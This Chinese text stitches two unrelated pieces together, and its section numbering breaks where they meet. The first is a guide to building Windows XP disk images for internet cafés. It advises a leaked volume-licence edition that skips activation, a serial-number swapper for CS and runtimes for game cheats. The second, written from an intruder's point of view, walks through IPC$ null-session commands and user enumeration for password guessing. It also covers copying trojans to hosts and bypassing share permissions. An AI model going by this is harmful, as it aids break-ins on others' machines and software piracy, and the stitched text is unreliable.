对于网吧经营者来说，操作系统的优劣，与自己的经济收入有着直接的关系。走进一家网吧，看着顺畅运行丰富的游戏资源，而走进另外一家，使用不到三分钟，机器死机重新启动，作为一名顾客，你会选择去哪一家网吧消费。

网吧的操作系统，与我们日常的家用操作系统不同。对于网吧来说，要保证操作系统运行稳定、运行速度快、抗病毒能力强等特点。同时，我们也要根据网吧的机器配置，合理的选择一款适合自己网吧机器使用的操作系统。

第一部分：适合安装Windows XP操作系统的最佳配置

对于Windows XP这款操作系统来说，占用的系统资源虽然有点大，但由于操作界面美观、运行稳定快速而得到了用户的喜爱。

适合安装XP的机器配置：

CPU：800Mhz以上的主频；内存：256MB或以上；硬盘：20G以上。其他硬件没有特殊要求。要想使Windows XP的运行流畅，内存至少是256MB，CPU主频不低于上述的配置就可以了。对于256MB内存的机器和512MB内存的机器，做系统优化的时候，有不同之处，请在阅读时注意。

第二部分：Windows XP操作系统的优化

一、Windows XP安装盘的版本选择

Windows XP操作系统，除需要安装密钥之外，还需要激活。为了方便我们的使用，我们通常选择使用Windows XP Professional上海市政府VLK版本，这个版本集成了SP1补丁。虽然现在Windows XP有了SP2补丁，但建议网吧不要使用。上海市政府版的XP，在安装时无需输入密钥，自动激活。

二、Windows XP的安装

我们以C1·7G/256MB/80G/Geforce MMX 440/Intel845的机器配置为例，简单叙述一下Windows XP的安装优化过程。

1、硬盘分区

C盘500MB，用来存放Windows 98的三个系统文件，还有网络克隆的程序，以备网络克隆用。

D盘2.4G，用来安装Windows XP操作系统。

E盘74G，用来安装游戏和日常用软件。

F盘，剩余的空间分配给F盘。

以上四个分区中，除C盘用FAT32系统外，其他三个分区全部使用NTFS文件系统。

2、传递Windows 98的系统文件

硬盘分区结束后，用Windows 98的启动盘启动机器，在DOS提示符下，输入Sys C:命令，将Windows 98的系统文件传递到C盘，以备网络克隆启动用。然后，复制一些必须的文件，如Himem.sys、Emm386.exe等文件到C盘。

3、安装Windows XP系统：

用Windows XP安装光盘启动，安装Windows XP操作系统。在选择安装路径时，选择安装在D盘，并使用NTFS文件系统。

三、驱动程序的安装：

Windows XP是继Windows2000之后微软开发的另外一款操作系统，这款操作系统支持的硬件更多，功能更全面，更智能。同时，这款操作系统，对硬件系统的要求也较高，特别是驱动程序。由于Windows XP支持更多的硬件，因此，很多硬件的驱动程序是无须安装的。

1、主板驱动：Windows XP安装完成后，如果在设备管理器中，没有黄色叹号或者黄色问号的总线型设备，无需安装主板驱动。如果在系统运行中，出现错误，可以尝试安装主板驱动看一下。

2、硬盘总线驱动：这款硬件的驱动，无需安装。对于使用Intel芯片主板的用户Intel英特尔Application Accelerator应用程序加速器必须安装，这个加速程序对系统提速有一定的作用。

3、USB总线驱动：在设备管理器中，查看一下USB总线的驱动版本，如果是USB2.0版本的驱动，无需安装，否则，请手动安装USB2.0的驱动程序。

4、网卡驱动：如果系统能够识别你的网卡，不需要重新安装新的网卡驱动。

5、声卡驱动：使用AC97声卡的用户，请选择V1.63版本的声卡驱动安装。非AC97声卡用户，请选择相应版本的驱动，并按照上文中的测试标准进行测试，一直到找到适合的驱动程序为止。

6、显卡驱动：使用Nvidia系列显卡的用户，请根据下表中的相应显卡，选择相应的驱动程序。

四、Windows XP系统的补丁安装

对于XP的一些补丁程序，我们最好在通过测试的情况下再安装。对于一些防病毒补丁，如冲击波病毒补丁和震荡波补丁，可以根据自己路由器中的安全策略，决定是否安装。

下面是在Windows XP操作系统中，必须安装的一些补丁程序，冲击波补丁、震荡波补丁、IE 6.0 SP1补丁、爱情后门补丁、泡泡堂输入法补丁程序。其他的系统补丁，建议经过测试后安装。

五、Windows XP系统的优化设置

1、系统减肥

A、在各种软硬件安装妥当之后，其实XP需要更新文件的时候就很少了。删除系统备份文件吧：开始→运行→sfc.exe /purgecache 近3xxM。

B、删除驱动备份： %windows%\\

driver cache\\i386目录下的driver.cab文件，通常这些文件是76m。

C、如果你没有看help的习惯，所以保留着%windows%\\help目录下的东西对我们来说是一种摆设，都干掉近4xM。

D、卸载不常用组件：用记事本修改\\%windows%\\inf\\sysoc.inf，用查找/替换功能，在查找框中输入,hide，（说明：替换的内容是一个逗号加hide，造成不要忘记把，写上，否则不生效）全部替换为空。这样，就把所有的,hide都去掉了，存盘退出后再运行“添加-删除程序就会看见“添加/删除 windows 组件”中多出不少选项；删除掉游戏啊，码表啊等不用的东西。

E、删除\\windows\\ime下不用的输入法，8xM。

2、关掉调试器Dr. Watson，运行drwtsn32，把除了“转储全部线程上下文”之外的全都去掉。否则一旦有程序出错，硬盘会响很久，而且会占用很多空间。如果你以前遇到过这种情况，请查找user.dmp文件并删掉，可能会省掉几十M的空间。这是出错程序的现场，对我们没用。另外蓝屏时出现的memory.dmp也可删掉。可在我的电脑/属性中关掉BSOD时的DUMP。

3、关闭“系统XP自带的还原”，右键“我的电脑”属性中，系统还原。

4、关闭“休眠支持”：因为休眠功能占的硬碟空间蛮大的, 所以关闭比较好, 控制台→电源选项→休眠(不要打勾)

5、加快XP网上邻居浏览速度！

打开注册表点击到：HKEY_LOCAL_MACHINE/Software/Microsoft/Windows

/CurrentVersion/Explorer/RemoteComputer/NameSpace。分栏出选择键值：{D6277990-4C6A-11CF-87-00AA0060F5BF}，删除下面的没有必要的键值，重新启动后，会发现桌面上少了许多图标。

6、关掉不必要的服务：

单击“开始”→“设置”→“控制面板”。双击“管理工具”→“服务”，打开后将看到服务列表，右键单击要配置的服务，然后单击“属性”。在“常规”选项卡上选择自动”、“手动”或“禁用”，其中“自动”表示每次系统启动时，Windows XP都自动启动该服务；“手动”表示Windows XP不会自动启动该服务，而是在你需要该服务时手动启动该服务；而“禁用”则表示不允许启动该服务。在实际配置时，选择“手动”或者“禁用”都可以实现关闭该服务的目的，推荐使用手动功能，这样你随时可以启动一些临时需要的服务。

有些服务是Windows XP所必需的，不能关闭，否则将会造成系统崩溃。至于各项服务的功能，我们可以通过双击该服务或将鼠标悬停在该服务名上查看。下面我们就先来看一看这些服务的说明，下面是被我全部禁止的服务：

Alerter：你未连上局域网并且不需要管理警报；

Clipbook：你不需要查看远程剪贴簿的剪贴页面；

distributed link tracking client：若不使用ntfs分区并且没有联入局域网；

distributed transaction coordinator：不需要同时处理多个数据库或者文件系统；

DHCP Client：如果你机器的IP地址是固定IP地址，可禁止；

DNS Client：如果你的机器DNS服务器地址是设置好的，可禁止；

fax service：不用windows 2000发送或者接收传真；

ftp publishing service：你的计算机不做ftp服务器；

iis admin service：你的计算机不做www服务器；

indexing service：你的计算机不提供远程文件索引和快速访问或者没有连上局域网；

internet connection sharing：你不准备用windows 2000做路由服务器，让多人共享一条线路上网；

ipsec policy agent：你未连接到windows 2000的域；

logical disk manager administrative service：你不准备使用磁盘配额；

message queuing：你未连接到windows 2000的域；

messenger：你未连接到windows 2000的域并且不需要管理警报；

net logon：你不想让局域网上的其他用户登录；

netmeeting remote desktop sharing：你不想使用netmeeting远程管理计算机；

network dde：你没有连入局域网；

network dde dsdm：你没有连入局域网；

performance logs and alerts：若不想知道计算机每一秒都干什么；

qos rsvp：你没有使用依赖于qos的程序；

remote access auto connection manager：你不想在程序企图读取网络信息时自动连接到网络；

remote procedure call (rpc) locator:你不需要管理rpc名称服务数据库；

routing and remote access:你的计算机不做路由器；

runas service:你不需要在某一用户下以另外一个用户的身份执行一个程序；

simple mail transport protocol (smtp):你的计算机不做邮件发送服务器；

smart card：你没有智能卡阅读器；

smart card helper：你没有旧式智能卡阅读器；

snmp trap service：你没有连接到windows 2000的域；

tcp/ip netbios helper service：你的计算机不准备让别人共享；

tcp/ip print server：不让你的计算机成为网络打印服务器；

telnet：不想远程控制计算机执行控制台命令；

uninterruptible power supply：没使用ups或ups不支持双向传输信号；

utility manager：不从一个窗口中启动和配置辅助工具；

windows management instrumentation：你不看你的系统管理信息；

world wide web publishing service：你的计算机不做www服务器；

vices.msc 里面有很多服务是没用的，开启只会浪费内存和资源。影响启动速度。关闭里面无关紧要的服务可以加快启动速度，减少负担！

我优化的系统只保留以下服务：

＊Plug and Play 这个不用我说了！

＊Remote Procedure Call (RPC) -系统核心服务。

＊Windows Audio -　控制着你听到的声音。关了就没声音了！

＊Windows Management Instrumentation - 很重要的服务，是管“服务依靠”的，但关了会出现奇怪的问题。

＊Workstation -很多服务都依靠这个服务，支持联网和打印／文件共享。

＊ Server 支持此计算机通过网络的文件、打印和命名?这个无法给别人共享文件夹！如果你不用可以关了这个！

＊Network Connections 管理“网络和拨号连接”文件夹中的对象?关了这个改ip很麻烦！

下面三个服务是系统事件通知的相互有关系。关了event log系统无法启动，其他的2个是给event log 返回消息的，可以关，但是系统日志会一直说有错误！不过为了好用，我还是将这几个服务开着。

Sys Event Notification

COM+ event system

Event Log

7、关闭鼠标阴影

在“控制面板”中，打开“鼠标”选项，在“指针”菜单中，将“启用鼠标阴影”选项取消就可以了。

8、修改桌面主题方式

由于Windows XP漂亮的外表，占用了大量的系统资源，为提高计算机的运行速度，可以使用Windows经典桌面主题。在显示器设置中，找到“主题”，将“主题”更改为“Windows经典主题”就可以了。

六、Windows XP开机相关项目优化

1、缩短等待时间：

运行注册表编辑器，找到 HKEY_LOCAL_MACHINE\\System\\

CurrentControlSet\\Control，将 WaitToKillServiceTimeout 设为：1000或更小。(原设定值：20000）即关闭程序时仅等待1秒。将 HungApp

Timeout 值改为：200( 原设定值：5000），表示程序出错时等待0.5秒。

2、自动关闭停止回应的程序：

打开注册表 HKEY_CURRENT_USER\\Control Panel\\Desktop 键， 将 AutoEndTasks 值设为 1。 ( 原设定值：0 ）

3、MsConfig：大多数朋友都应该熟识MsConfig了，这是一个系统内置的Windows设置工具。点击开始菜单，选择“运行”，然后在录入框中敲入“msconfig”回车。我们要动手脚的是（启动）选项卡，点击它，这个选项卡中显示了Windows启动时运行的所有程序。这里没有一个程序对Windows来说是生死悠关的，所以放心大胆地把不要的去掉。把部分勾勾去掉之后，Windows启动会快些，同时空闲的系统资源也会多出一些。

4、取消XP自带的压缩文件夹工具：

点击开始→运行，敲入： regsvr32 /u zipfldr.dll 。然后回车即可。

5、关闭错误回报：

控制台→系统→进阶→右下角→错误报告→关闭

6、正确取消XP非正常关机磁盘扫描的方法加汉化Win XP磁盘扫描：

只扫描不修复我们在资源管理器中右击任意驱动器名称，选择“属性”，进入“工具”选项卡，单击“开始检查”按钮，可打开如图所示的对话框。如果不勾选任何修复选项，即使是对系统分区的扫描也可以在Windows环境中进行，出现的也都是中文提示。这相当于在“开始→运行”或“命令行提示符”中输入“Chkdsk X:”（X为驱动器盘符代号）。

A、修复参数与选项对应关系

如果在如图所示的扫描对话框中勾选“自动修复文件系统错误”，即相当于为Chkdsk命令添加了“/f ”参数；勾选“扫描并试图修复坏扇区”即相当于加了“/r”参数。其中，“/f ”参数可以修复磁盘上的文件错误；“/r ”参数可以找到坏扇区并恢复可读取的信息。这两项操作都必须锁定磁盘，对于系统分区，由于Windows会占用系统文件，故无法锁定系统所在磁盘，常规下只能在下次重新启动、进入Windows前进行磁盘扫描。如果你将某些系统文件（如虚拟内存）转移到了其它分区，则该分区也不能进行有修复功能的磁盘扫描操作。

B、修复扫描中文化

如果希望对系统分区进行带有修复功能的磁盘扫描时，出现的也都是中文提示的话，则需要在“恢复控制台”中进行。

进入“恢复控制台”，选系统所在分区的序号、输入管理员密码（如果没有，直接回车）后，在命令提示符后面输入“Chkdsk D: /r”即可对D盘进行扫描检查。系统首先会列出卷的序列号，并显示扫描进度的百分比，在扫描结束时，列出该分区的空间总量、可用空间等信息。整个扫描过程始终显示中文提示，够方便吧！

C、参数含义：

Chkdsk [drive] 指定驱动器，如果不指定，默认为系统所在驱动器；

/V 在FAT/FAT32上，显示磁盘上每个文件的完整路径和名称；

/r 查找有问题的扇区，恢复可读信息（隐含/p，即：即使驱动器不在检查范围，也执行扫描检查。该参数不对驱动器作任何更改）。

提示：将故障恢复控制台安装为启动选项的方法是：在 XP 运行时将安装 CD 插入 CD－ROM 驱动器。然后单击“开始→运行”，输入“X＼i386＼winnt32．exe /cmdcons”回车，再按照提示进行操作即可。X代表CD－ROM 驱动器号，也可以是复制到硬盘上的Windows XP安装文件夹路径，如“E＼WinXP”。

7、更改临时文件的位置

A、系统临时文件：由于系统每天都要产生大量的临时文件，如果一直放在系统盘，会产生大量的磁盘碎片，造成系统速度越来越慢。临时文件的产生，一般是安装软件、解压释放压缩包和上网的时候会产生一些临时文件。而且如果频繁下载的话，也会有大量的临时文件产生。

更改临时文件的存放位置的方法是，右键“我的电脑”，“属性”对话框中，“高级”中的“环境变量”设置。“变量”temp和tmp全部设置为其他盘中，选择“编辑”，然后更改一下路径就可以了。只更改Local Settings\\Temp前面的变量就行了，更改为一个盘符的卷标就可以。下面“系统变量”中还有temp和tmp这两个变量，直接更改成相同的就行了。

B、Internet临时文件，直接右键“Internet Explorer”中的“属性”对话框中，选择“常规”，在“Internet临时文件”选项中，点击设置对话框，选择“移动文件夹”，将Internet临时文件也指向到系统文件临时文件夹的位置就可以了。

第三部分：Windows XP系统存在的一些问题的解决方法

一、泡泡堂下无法切换输入法的问题

大家都知道，进入泡泡堂游戏后，无法使用快捷键切换输入法。为了解决这个问题，有以下两种方法：

1、安装泡泡堂输入法补丁，下载地址为http://www.txwm.com/Soft/59.html。安装此补丁后，还需要进行下列设置。打开“控制面板”，找到“区域和语言选项”中的“语言”菜单，打开“详细信息”后，我们可以看到图一。打开“语言栏”菜单，关闭高级文字服务，然后

在“键设置”菜单中，设置一下切换输入法的热键就可以了。

2、不安装泡泡堂输入法补丁，直接为每一种输入法定义一个热键。此方法不方便顾客的使用，因此不推荐使用。

二、CS游戏中鼠标加速的问题：

由于Windows XP对鼠标有加速功能，因此在CS游戏中，鼠标的反应过于灵敏，使CS爱好者甚为苦恼。要解决这个问题，可以进行以下两步操作。

第一步：导入禁止鼠标加速注册表

将下面注册表的内容，复制到记事本中，然后保存为一个.reg的文件，导入注册表后就可以了。注册表的内容如下：

Windows Registry Editor Version 5.00　　[HKEY_CURRENT_USER\\Control Panel\\Mouse]　　"SmoothMouseXCurve"=hex:00,00,00,00,00,00,00,00,00,a0,00,00,00,00,00,00,00,40,01,00,00,00,00,00,00,80,02,00,00,00,00,00,00,00,05,00,00,00,00,00,

"SmoothMouseYCurve"=hex:00,00,00,00,00,00,00,00,66,a6,02,00,00,00,00,

00,cd,4c,05,00,00,00,00,00,a0,99,0a,00,00,00,00,00,38,33,15,00,00,00,00,00,

第二步：在CS快捷方式的属性的目标后面加上以下参数-noforcemaccel -noforcemparms –noforcemspd（如图二）。

经过以上两个步骤就可以彻底去掉在XP系统下鼠标加速。还有一点，修该后在XP下玩CS鼠标速度比Win98下要更慢，所以在XP下要达到原来的鼠标速度，必须要调快40%。根据测试，单纯使用第二个步骤也有效，但对于个别鼠标没有作用。

三、Windows XP中退出大型游戏速度慢的问题

对于使用256MB内存的机器来说，使用Windows XP的时候，在退出游戏的时候，有时候出现特别慢的现象。将“性能选项”的“高级”设置更改为如图三所示就可以了。右键单击“我的电脑”属性中，选择“高级”，在“性能”选项中，点“设置”后，出现“性能选项”菜单，点一下“高级”就出现下面的菜单了。

四、红色警戒游戏无法正常联机问题

红色警戒在XP下玩局域网游戏对战时，无法联机。我们进入红色警戒游戏联机界面后，有一个网卡设定，修改一下网卡的IPX内部编号就可以正常联机了。同时，我们也可以通过红警的一个补丁，来完成这个操作，在安装还原软件前，运行一下红色警戒的联机补丁，就万事大吉了。

五、CS反恐无法正常联机的问题

CS游戏，在网吧里是一个经久不衰的经典网络游戏。CS游戏的一个序列号，只能支持五台机器正常联机，由于网吧的系统盘是同一个母盘克隆出来的，全网吧都在使用同一个序列号，这就是无法正常联机的原因。

要解决CS的联机问题，我们可以下载一个CS序列号自动替换器，实现进入CS游戏自动切换序列号，并且不会重复，彻底解决CS无法正常联机的问题。

六、部分外挂无法使用

在Windows XP操作系统中，部分游戏外挂经常无法使用。由于外挂一般是用VB语言编写的，在Windows XP系统中，没有安装VB运行库文件，因此无法正常运行游戏外挂。下载VB运行库文件，安装后就可以正常使用各种游戏外挂程序了。

第四部分：母盘测试

Windows XP系统盘做好后，要运行测试才能确认母盘是否存在毛病，对于在测试中的问题，及时找出方法解决。

在进入以下测试步骤之前，必须保证机器能够正常运行，而且要保证所有的软件可以正常运行。

一、声卡方面的测试

1、听音乐（在线音乐或者MTV都可以），声音不变态为正常。

2、进入传奇世界测试，在没有关闭声音的情况下，没有卡机为正常。

3、进入语音聊天室，可以正常语音聊天正常。对于部分AC’97的声卡，在以上两步测试中正常，但进入一些语音聊天室时，无法说话，只能听到对方说话。

4、打开音乐，进入CS游戏，如果退出重新返回CS游戏后，CS游戏仍有声音为正常。

所有的声卡驱动安装完成后，都可以通过这几个步骤进行测试，如果有一项无法通过，则证明此驱动程序不适合该硬件使用。

二、显卡方面的测试

目前主流的机器配置，一般使用Nvidia系列的显卡。如何判断这一款驱动是否为该显卡的优化驱动版本，不能以显卡属性设置中有16位增强色这一选项为依据。我们可以通过以下几个简单的方法进行测试：

1、进入奇迹MU游戏，然后打开聊天对话框，如果输入文字时，屏幕没有频繁的闪动现象为正常。

2、将显卡的垂直同步关闭后，进入CS后，FPS值如果无法稳定在99-100，则该款驱动程序与显卡不适合。

3、进入泡泡堂、传奇世界、天堂Ⅱ、魔兽争霸等对显卡要求高的游戏进行测试，如果不出现卡机为正常。

第五部分：母盘制作经验总结

一、母盘制作的原则

1、稳定性：系统运行稳定是最关键的一条。网吧的工作时间长，必须保证母盘不能频繁死机。

2、易用性：在制作系统母盘时，一定要充分考虑到顾客的使用习惯及需求。特别是在系统的限制方面，如下载等要根据网吧的具体情况，再进行限制。建议网吧的系统，不要对用户限制太多。

3、安全性：一定要加强防病毒和木马的能力，加载最具优势的杀毒软件，推荐使用诺顿杀毒企业版。在安全性和系统性能方面，宁肯牺牲一点系统性能，也要保证系统的安全。

4、游戏安装：由于各地的网吧消费主体不同，因此需要根据自己的消费群体，制订游戏的安装。游戏不要太多，要培养自己的消费群体，并要起到对顾客的消费引导作用。

二、母盘的测试工作

1、前期测试：母盘制作完毕后，首先要进行前期的测试，主要测试机器中所安装的软件是否正常，然后进入下一阶段的测试。

2、综合测试：按照第四部分的文字叙述，对母盘进行综合测试。特别是对于显卡和声卡方面的测试。做母盘，其实就是选择合理完美的驱动。

3、客户测试：经过上面两个步骤的测试后，请在网吧克隆部分机器，进行客户测试。在这一段时间内，把客户对样机的意见和要求，记录下来，并逐一改进。测试的时间根据用户使用的时间为准，每台机器的测试时间，不能低于7*24个小时的时间。

备注：本文中的部分软件，可以在www.hgjt.net上下载到，请用户自行查找，本文不再提供下载地址。

至此，Windows XP的优化工作已经完成。对于系统中出现的一些问题，不一定涉及全面，如有问题，请大家通过杂志的专家信箱提出！※

二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系 统安全性的降低。
平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个‘后门’：空会话（Null session）。那么什么是空会话呢？

三 什么是空会话
在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下：
1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建
立；
2）服务器产生一个随机的64位数（实现挑战）传送回客户；
3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结
果返回到服务器（实现响应）；
4）服务器接受响应后发送给本地安全验证（LSA），LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。当对挑战的响应核实为正确 后，一个访问令牌产生，然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程，那么空会话又如何呢？

空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系 统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符SID（它标识了用户和所属组），对于一个空会话，LSA提供的令牌的SID是S-1-5-7，这就是空会话的SID，用户名是：ANONYMOUS LOGON（这个用户名是可以在用户列表中看到的，但是是不能在SAM数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组：
Everyone
Network
在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢？

四 空会话可以做什么
对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows 2000 和以后版本中默认只有管理员和备份#作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。
从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的，成功的导出用户列表大大增加了猜解的成 功率，仅从这一点，足以说明空会话所带来的安全隐患，因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令：

1 首先，我们先建立一个空连接（当然，这需要目标开放ipc$）
命令：net use \\ip\ipc$ "" /user:""
注意：上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。

2 查看远程主机的共享资源
命令：net view \\ip
解释：前提是建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下面的结果，但此命令不能显示默认共享。

在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。

3 查看远程主机的当前时间
命令： net time \\ip
解释：用此命令可以得到一个远程主机的当前时间。

4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）
命令：nbtstat -A ip
用此命令可以得到一个远程主机的NetBIOS用户名列表，返回如下结果：

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SERVER UNIQUE Registered
OYAMANISHI-H GROUP Registered
OYAMANISHI-H GROUP Registered
SERVER UNIQUE Registered
OYAMANISHI-H UNIQUE Registered
OYAMANISHI-H GROUP Registered
SERVER UNIQUE Registered
OYAMANISHI-H UNIQUE Registered
..__M##ROWSE__. GROUP Registered
INet~Services GROUP Registered
IS~SERVER...... UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的#作会在Event Log中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看ipc$所使用的端口是什么？

五 ipc$所使用的端口
首先我们来了解一些基础知识：
1 SMB: (Server Message Block) Windows协议族，用于文件打印共享的服务；
2 NBT: (NETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现，即使用139（TCP）端口；而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。

有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了：

对于win2000客户端（发起端）来说：
1 如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败；
2 如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。

对于win2000服务器端来说：
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放（LISTENING）；
2 如果禁止NBT，那么只有445端口开放。

我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。

六 ipc管道在hack攻击中的意义
ipc管道本来是微软为了方便管理员进行远程管理而设计的，但在入侵者看来，开放ipc管道的主机似乎更容易得手。通过ipc管道，我们可以远程调用一些系统函数（大多通过工具实现，但需要相应的权限），这往往是入侵成败的关键。如果不考虑这些，仅从传送 文件这一方面，ipc管道已经给了入侵者莫大的支持，甚至已经成为了最重要的传输手段，因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然，我们也不能忽视权限在ipc管道中扮演的重要角色，想必你一定品尝过空会 话的尴尬，没有权限，开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限，那么ipc管道这把双刃剑将显示出它狰狞的一面。

七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因：

1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的；

2 如果想成功的建立一个ipc$连接，就需要响应方开启ipc$共享，即使是空连接也是这样，如果响应方关闭了ipc$共享，将不能建立连接；

3 连接发起方未启动Lanmanworkstation服务（显示名为：Workstation）：它提供网络链结和通讯，没有它发起方无法发起连接请求；

4 响应方未启动Lanmanserver服务（显示名为：Server）：它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它主机将无法响应发起方的连接请求，不过没有它仍可发起ipc$连接；

5 响应方未启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份（不过这种情况好像不多）；

6 响应方的139，445端口未处于监听状态或被防火墙屏蔽；

7 连接发起方未打开139，445端口；

8 用户名或者密码错误：如果发生这样的错误，系统将给你类似于''无法更新密码''这样的错误提示（显然空会话排除这种错误）；

9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号""即可；

10 如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。

另外,你也可以根据返回的错误号分析原因：

错误号5，拒绝访问：很可能你使用的用户不是管理员权限的；
错误号51，Windows无法找到网络路径：网络有问题；
错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连；
错误号1326，未知的用户名或错误密码：原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动；
错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。

八 复制文件失败的原因
有些朋友虽然成功的建立了ipc$连接，但在copy时却遇到了这样那样的麻烦，无法复制成功，那么导致复制失败的常见原因又有哪些呢？

1 对方未开启共享文件夹
这类错误出现的最多，占到50%以上。许多朋友在ipc$连接建立成功后，甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下你想要复制的共享文件夹是否存在（用软件查看当然更好），不要认为能建立ipc$连接就一定有共享文件夹存在。

2 向默认共享复制失败
这类错误也是大家经常犯的，主要有两个小方面：

1）错误的认为能建立ipc$连接的主机就一定开启了默认共享，因而在建立完连接之后马上向c$,d$,admin$之类的默认共享复制文件，一旦对方未开启默认共享，将导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享，并不能说明默认共享 一定存在。ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，并不是哪个实际的文件夹，而默认共享却是实实在在的共享文件夹；

2）由于net view \\IP 这个命令无法显示默认共享文件夹（因为默认共享带$），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的#作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以 避免此类错误的发生）

要点：请大家一定区分ipc共享，默认共享，普通共享这三者的区别：ipc共享是一个管道，并不是实际的共享文件夹；默认共享是安装时默认打开的文件夹；普通共享是我们自己开启的可以设置权限的共享文件夹。

3用户权限不够，包括四种情形：
1）空连接向所有共享（默认共享和普通共享）复制时，权限是不够的；
2）向默认共享复制时，在Win2000 Pro版中，只有Administrators和Backup Operators组成员才可以，在Win2000 Server版本 Server Operatros组也可以访问到这些共享目录；
3）向普通共享复制时，要具有相应权限（即对方管理员事先设定的访问权限）；
4）对方可以通过防火墙或安全软件的设置，禁止外部访问共享；

注意：
1 不要认为administrator就一定具有管理员权限，管理员名称是可以改的
2 管理员可以访问默认共享的文件夹，但不一定能够访问普通的共享文件夹，因为管理员可以对普通的共享文件夹进行访问权限设置，如图6，管理员为D盘设置的访问权限为仅允许名为xinxin的用户对该文件夹进行完全访问，那么此时即使你拥有管理员权限，你仍然 不能访问D盘。不过有意思的是，如果此时对方又开启了D$的默认共享，那么你却可以访问D$，从而绕过了权限限制，有兴趣的朋友可以自己做测试。

4被防火墙杀死或在局域网
还有一种情况，那就是也许你的复制#作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；或者你把木马复制到了局域网内的主机，导致连接失败（反向连接的木马不会发生这种情况）。如果你没有想到这种情况，你会以为是复制上出了问题，但实际你的复 制#作已经成功了，只是运行时出了问题。

